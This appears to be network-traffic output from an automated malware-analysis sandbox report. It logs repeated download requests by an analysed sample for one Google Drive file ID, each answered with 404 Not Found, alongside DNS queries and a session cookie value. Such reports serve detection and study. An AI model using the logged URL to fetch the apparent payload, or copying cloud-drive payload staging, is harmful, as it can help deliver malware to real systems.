      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTOxKKgv0yqzSLoegjtDuFz8wG_4tUO9ZVxnyZ1AfQolu7Ta0Y7LzJkmzzFWj-wtHB6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:54:59 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-t114D-0_h5tx6l17ENxXPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI; expires=Sat, 12-Jul-2025 14:54:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQq3kgsiWJfFbHzE-ofbyjbul2Dr1f4-OgcB0uXXSlFyMkApjy5nVwj0PFeW0imsTKDtL6_GG8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:02 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce--fKHTpzmTtkfK_LMx4XT6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQw9k5PSPHYoGsrDsuuse-WYQLdR1cbQHAaMkg6KwNM7OmtwCxzbc5qBUAOQ5qdvtgh1Tf9X48Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:04 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-OwO8ORBeJ2epaT6YjiGrjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4tzc24yzZPWi4Zdo8IjJ5RaZU4FGehLnWjnm-O-y_RJBpWVbVM3Iwa7NteBPeFaXu7ieKkJbIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:07 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GUqHkR93St__dVAqsdPTHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQqrI4IVWBzUsNQSvKtxRIzBckrnSsKn8Csvr3rPIoUeivs7ZRs3nA6G9QyEvpYC61_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-36pnhRGuC8USUQf-rt4aIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRgZ3RkjCrev2TC2HEZqX0X_FWf6FSrblBlaJX1kZc9eJN-dePm_7mM8rXdIrICzJoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:11 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-KKXYcqXbDpC2lPjPfgcleg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRS1TvkPj5_KTp9_ekNxZGBr9ceCpw_vFb4MkfVElYg7yIUMj5qkMP_ZowhSgOMW2wLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:14 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-vtonzqy3wwwa2PjxkLvEAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRpiqGEPX-n2utksJGd34FgwjlnM9Cf46XbpI9kV312sUK5kBwMrd3OtJaDE6q8U5ZxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:16 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-IHyfGK6NjM1477L0lhPOeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; 